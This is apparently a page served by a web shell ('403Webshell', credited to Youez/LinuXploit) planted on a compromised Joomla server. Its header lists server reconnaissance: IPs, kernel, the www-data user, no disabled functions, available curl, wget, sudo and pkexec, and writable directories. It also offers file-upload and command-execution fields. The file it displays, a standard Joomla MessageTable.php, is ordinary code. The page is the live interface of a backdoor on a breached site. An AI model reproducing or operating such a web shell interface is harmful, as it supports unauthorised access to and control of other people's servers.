403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.197.209
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/fcs/administrator/components/com_messages/src/Table/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/fcs/administrator/components/com_messages/src/Table/MessageTable.php
<?php

/**
 * @package     Joomla.Administrator
 * @subpackage  com_messages
 *
 * @copyright   (C) 2006 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Component\Messages\Administrator\Table;

use Joomla\CMS\Language\Text;
use Joomla\CMS\Table\Table;
use Joomla\CMS\User\User;
use Joomla\Database\DatabaseDriver;
use Joomla\Event\DispatcherInterface;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Message Table class
 *
 * @since  1.5
 */
class MessageTable extends Table
{
    /**
     * Constructor
     *
     * @param   DatabaseDriver        $db          Database connector object
     * @param   ?DispatcherInterface  $dispatcher  Event dispatcher for this table
     *
     * @since   1.5
     */
    public function __construct(DatabaseDriver $db, ?DispatcherInterface $dispatcher = null)
    {
        parent::__construct('#__messages', 'message_id', $db, $dispatcher);

        $this->setColumnAlias('published', 'state');
    }

    /**
     * Validation and filtering.
     *
     * @return  boolean
     *
     * @since   1.5
     */
    public function check()
    {
        try {
            parent::check();
        } catch (\Exception $e) {
            $this->setError($e->getMessage());

            return false;
        }

        // Check the to and from users.
        $user = new User($this->user_id_from);

        if (empty($user->id)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_FROM_USER'));

            return false;
        }

        $user = new User($this->user_id_to);

        if (empty($user->id)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_TO_USER'));

            return false;
        }

        if (empty($this->subject)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_SUBJECT'));

            return false;
        }

        if (empty($this->message)) {
            $this->setError(Text::_('COM_MESSAGES_ERROR_INVALID_MESSAGE'));

            return false;
        }

        return true;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit